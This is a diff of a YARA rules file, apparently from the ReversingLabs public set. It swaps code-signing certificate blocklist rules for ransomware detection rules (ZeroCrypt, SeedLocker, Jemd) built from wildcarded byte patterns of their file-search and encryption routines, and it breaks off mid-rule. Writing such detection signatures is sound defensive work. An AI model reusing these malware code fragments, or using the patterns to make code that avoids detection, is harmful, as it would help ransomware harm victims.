-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pribyl Handels GmbH" and pe.signatures [ i ] . serial == "11:ed:d3:43:e2:1c:36:ac:98:55:55:d8:5c:16:13:5f" and 1589925600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $find_files and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_093Fe63D1A5F68F14Ecaac871A03F7A3 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Zerocrypt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects ZeroCrypt ransomware."
 		author = "ReversingLabs"
-		id = "ce0b23fd-5f79-5b90-8d5c-2ff59ac39df6"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "89e47d7f-1ac4-570d-8ae1-30f0acc21462"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4068-L4084"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.ZeroCrypt.yara#L1-L94"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "333c58a9af2d94604b637ab0a7280b6688a89ff73e30a93a8daed040fab7f620"
+		logic_hash = "947925206ded187eac31c5046d75ab017869ae3f8dc906f2e5536d4db219f108"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "ZeroCrypt"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_file_1 = {
+            55 8B EC 83 E4 ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ??
+            ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 84 24 ?? ??
+            ?? ?? 64 A3 ?? ?? ?? ?? 8B F2 8B F9 68 ?? ?? ?? ?? 8B D7 8D 4C 24 ?? E8 ?? ?? ?? ??
+            83 C4 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 8B D0 56 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? C6 84 24 ?? ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? FF 74 24 ?? E8 ?? ?? ?? ??
+            83 C4 ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 83 7E ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 89 44
+            24 ?? 72 ?? 8B 16 EB ?? 8B D6 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ??
+            ?? ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84
+            24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ??
+            C6 84 24 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B D6 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B F0 C6 84 24 ?? ?? ?? ?? ?? 8B
+            D7 68 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 84 24 ?? ?? ?? ?? ?? 8B D0
+            56 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 84 24 ?? ?? ?? ?? ?? 8B D0 68 ?? ?? ?? ??
+            8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 C6 84 24 ?? ?? ?? ?? ?? 8D 84 24 ?? ?? ??
+            ?? 3B C6 74 ?? 83 BC 24 ?? ?? ?? ?? ?? 72 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 56 8D 8C 24 ?? ?? ?? ?? C7 84 24 ?? ??
+            ?? ?? ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 83
+            7C 24 ?? ?? 72 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 44 24 ?? ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? C6 84 24 ?? ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ??
+            FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? 66 89 44 24 ?? C6 84 24 ?? ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? FF 74 24 ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24
+        }
+		$encrypt_file_2 = {
+            C6 84 24 ?? ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ??
+            33 C0 C7 44 24 ?? ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 66 89 44
+            24 ?? 8D B4 24 ?? ?? ?? ?? 0F 43 BC 24 ?? ?? ?? ?? 8D 44 24 ?? 83 BC 24 ?? ?? ?? ??
+            ?? 50 0F 43 B4 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 57 56 8B 00 FF D0 85 C0 68 ?? ?? ?? ?? 0F 95 C3 E8 ?? ?? ?? ?? 83 C4 ?? 85
+            C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 84 DB 0F 84 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ??
+            8D 44 24 ?? 8D B4 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 0F 43 B4 24 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 56 8B 00 FF D0 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A
+            ?? 50 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6
+            84 24 ?? ?? ?? ?? ?? 8D 4C 24 ?? 6A ?? 83 EC ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 4C
+            24 ?? E8 ?? ?? ?? ?? 6A ?? 83 EC ?? 8D 8C 24 ?? ?? ?? ?? 8B 58 ?? 03 18 E8 ?? ?? ??
+            ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 44 24 ?? ?? ?? ??
+            ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 33 C9 8B 00 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84
+            24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ??
+            ?? ?? ?? 66 89 8C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 84
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ??
+            ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8B F8 8D 4C 24 ?? 57 BE ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 4C 24 ?? 8B 41 ?? F6 84 04 ?? ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? BA ?? ?? ?? ??
+            03 C8 8B F3 33 C0 39 41 ?? 0F 44 C2 83 E0 ?? 89 41 ?? 85 41 ?? 74 ?? 6A ?? E8 ?? ??
+            ?? ?? 56 57 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 83 EC ?? 8D 8C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 6A ?? 56 57 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? F3 0F 6F 00 F3 0F 7F 07 E8 ?? ?? ?? ?? F3 0F 6F
+        }
+		$encrypt_file_3 = {
+            00 F3 0F 7F 47 ?? F3 0F 6F 40 ?? F3 0F 7F 47 ?? F3 0F 6F 40 ?? 8D 84 24 ?? ?? ?? ??
+            50 51 F3 0F 7F 47 ?? 57 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4
+            ?? 85 F6 74 ?? 6A ?? 83 EC ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF B4 24 ??
+            ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            85 C0 75 ?? 8B 44 24 ?? 8D 4C 24 ?? 8B 40 ?? 03 C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75
+            ?? 83 C8 ?? 83 E0 ?? 89 41 ?? 85 41 ?? 74 ?? 6A ?? E8 ?? ?? ?? ?? 85 F6 74 ?? 56 E8
+            ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B3 ?? C6 84 24 ?? ?? ?? ?? ?? 8D 8C
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 44 24 ?? C6 84 24 ??
+            ?? ?? ?? ?? 50 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 32 DB
+            C6 84 24 ?? ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 72 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ??
+            ?? 66 89 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 72 ?? FF
+            B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ??
+            ?? 83 BC 24 ?? ?? ?? ?? ?? 72 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0
+            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 8A C3 C7 84 24 ?? ?? ?? ??
+            ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 8C 24 ?? ?? ??
+            ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPECTACLE IMAGE LTD" and pe.signatures [ i ] . serial == "09:3f:e6:3d:1a:5f:68:f1:4e:ca:ac:87:1a:03:f7:a3" and 1562716800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $encrypt_file_1 and $encrypt_file_2 and $encrypt_file_3
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Bb26B7B6634D5Db548C437B5085B01C1 : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Seedlocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects SeedLocker ransomware."
 		author = "ReversingLabs"
-		id = "443a876a-dfd7-5a9e-bb15-a44a53363494"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "efa3dd2e-faf4-5882-aef8-85189e65f0f9"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4086-L4104"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.SeedLocker.yara#L1-L91"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "58d574b196f84416eb04000205cd8f4817618003f2948bb0eb7d951c282ef6ff"
+		logic_hash = "a478efcfb03e3eeebe72d9a71629456cf061c3c779fbdde99539854caf8c7c33"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "SeedLocker"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO \"IT Mott\"" and ( pe.signatures [ i ] . serial == "00:bb:26:b7:b6:63:4d:5d:b5:48:c4:37:b5:08:5b:01:c1" or pe.signatures [ i ] . serial == "bb:26:b7:b6:63:4d:5d:b5:48:c4:37:b5:08:5b:01:c1" ) and 1591919307 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_29128A56E7B3Bfb230742591Ac8B4718 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "b868d2f2-3852-57a3-be01-32cc16eb2ff7"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4106-L4122"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5a89fec015e56ddddaed75be91a87288dcd27841937d26e3416187913c4f0b85"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$search_files = {
+            48 89 5C 24 ?? 48 89 7C 24 ?? 55 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 8B
+            05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 48 8B F9 4C 8D 05 ?? ?? ?? ?? 4C 8B C9
+            BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8D ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ??
+            48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF
+            15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 44 24 ?? 4C 8B CF 4C 8D 05 ?? ?? ?? ?? 48 89 44 24
+            ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? F6 44 24 ?? ?? 48 8D 8D ??
+            ?? ?? ?? 74 ?? 48 8D 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85
+            ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B 8D ?? ?? ??
+            ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 7B ?? 49 8B E3
+            5D C3
+        }
+		$encrypt_files_p1 = {
+            FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 63 C8 48 8D 85 ?? ?? ??
+            ?? 48 8D 04 48 48 83 C0 ?? 66 83 38 ?? 75 ?? 45 33 FF 4C 8D 05 ?? ?? ?? ?? 66 44 89
+            38 45 33 C9 48 83 C0 ?? 4C 89 7C 24 ?? 48 89 05 ?? ?? ?? ?? 33 D2 48 8D 05 ?? ?? ??
+            ?? 44 89 7C 24 ?? 33 C9 48 89 05 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 D2 45 8D 47 ?? 33
+            C9 FF 15 ?? ?? ?? ?? 48 8B F0 48 85 C0 74 ?? 48 8B 1D ?? ?? ?? ?? 48 81 C3 ?? ?? ??
+            ?? EB ?? 48 8B CB FF 15 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B D3 48 8B CE 44 8B F0 FF
+            15 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B C8
+            FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 41 8D 46 ?? 48 63 C8 48 8D 1C 4B 66 44
+            39 3B 75 ?? 48 8B CE FF 15 ?? ?? ?? ?? 33 D2 8D 4A ?? FF 15 ?? ?? ?? ?? 48 8B F8 48
+            83 F8 ?? 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 48 8B 1D ?? ?? ?? ?? 48 81
+            C3 ?? ?? ?? ?? EB ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B D3 48 8D 4C 24 ?? 44 8B F0 FF
+            15 ?? ?? ?? ?? 85 C0 75 ?? 44 8B 44 24 ?? 8D 48 ?? 33 D2 FF 15 ?? ?? ?? ?? 48 8B F0
+            48 83 F8 ?? 74 ?? 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 41 8D
+            46 ?? 48 63 C8 48 8D 1C 4B 66 44 39 3B 75 ?? 48 8D 54 24 ?? 48 8B CF FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? 48 8B CF FF 15 ?? ?? ?? ?? 33 D2 48 8D 8D ?? ?? ?? ?? 41 B8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 48 8D 35 ?? ?? ?? ?? 48
+        }
+		$encrypt_files_p2 = {
+            8D 8D ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 44 8D 42 ?? E8 ?? ?? ?? ?? 4C 8B 05 ?? ?? ??
+            ?? 48 8D 8D ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 4C 89 BD
+            ?? ?? ?? ?? 44 8B CB C7 44 24 ?? ?? ?? ?? ?? 45 33 C0 48 8D 8D ?? ?? ?? ?? 33 D2 FF
+            15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 48 8D 44 24 ?? 45
+            33 C9 45 33 C0 48 89 44 24 ?? 8D 53 ?? 33 C9 FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ??
+            48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ??
+            ?? 3D ?? ?? ?? ?? 75 ?? 44 8B CB C7 44 24 ?? ?? ?? ?? ?? 45 33 C0 48 8D 8D ?? ?? ??
+            ?? 33 D2 FF 15 ?? ?? ?? ?? 48 8B BD ?? ?? ?? ?? 48 85 FF 0F 84 ?? ?? ?? ?? 48 8B 0D
+            ?? ?? ?? ?? 41 8B DF 48 81 C1 ?? ?? ?? ?? 45 8B F7 FF 15 ?? ?? ?? ?? 85 C0 7E ?? 49
+            8B F7 48 8B 05 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 0F BE 8C 06 ?? ?? ??
+            ?? 44 0F BE 8C 06 ?? ?? ?? ?? 89 4C 24 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2
+            48 8D 8D ?? ?? ?? ?? 44 8D 42 ?? E8 ?? ?? ?? ?? 8B CB 48 8D 76 ?? FF C3 41 83 C6 ??
+            88 84 0D ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 81 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 44
+        }
+		$encrypt_files_p3 = {
+            3B F0 7C ?? 48 8D 35 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 45 33 C9 48 89 44 24 ?? 48 8D
+            95 ?? ?? ?? ?? 44 8B C3 44 89 7C 24 ?? 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
+            ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 4C 8B C3 E8 ??
+            ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 45 33 C9 C7 44 24 ?? ?? ?? ?? ??
+            48 89 44 24 ?? 33 D2 48 8D 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 48 89 44 24 ?? 45 8D 41
+            ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 41 8B DF 44 39 BD ?? ?? ?? ?? 76 ?? 8B C3 4C 8D 05
+            ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 44 0F B6 8C 05 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF C3 3B 9D ?? ??
+            ?? ?? 72 ?? 48 8B 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 D2 48 8B CF FF 15 ?? ?? ?? ??
+            48 8B 05 ?? ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? 48 83 C0 ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ??
+            ?? ?? 48 89 44 24 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 06 00 48
+            8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 66 44 89 BD ?? ?? 00 00 F3 0F 7F 85 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 8D 8D ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 48 8B 8D ?? ?? ?? ??
+            48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 73 ?? 49 8B 7B ??
+            49 8B E3 41 5F 41 5E 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Programavimo paslaugos, MB" and pe.signatures [ i ] . serial == "29:12:8a:56:e7:b3:bf:b2:30:74:25:91:ac:8b:47:18" and 1590900909 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $search_files and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_7Bfbfdfef43608730Ee14779Ee3Ee2Cb : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Jemd : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Jemd ransomware."
 		author = "ReversingLabs"
-		id = "fdc2f6a0-8fae-537e-812f-b0c292f76b1e"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "ef981ffa-8801-50f0-9441-5f2bfcf44133"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4124-L4140"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Jemd.yara#L1-L105"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f8f233b78e9d3558b0cd7978e3c5fa32645a3bb706c6fdec7f1e4195cf513f10"
+		logic_hash = "552e0fc118031e953dee2e7c6bf8234a5a90de8c34b0e2724dfe99f2b28b8c51"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Jemd"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CSTech Software Inc." and pe.signatures [ i ] . serial == "7b:fb:fd:fe:f4:36:08:73:0e:e1:47:79:ee:3e:e2:cb" and 1590537600 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_62205361A758B00572D417Cba014F007 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "85da8e0e-d791-5fed-b9ea-c681462651a6"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4142-L4158"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ebf28921c81191bcf6130baf6532122bb320cc916e38ab225f0acdcb57ea00f3"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files_1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 33 DB 89 9D ?? ?? ?? ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B
+            45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ??
+            64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? B8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 75
+            ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B
+            45 ?? 50 8B 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? B1 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
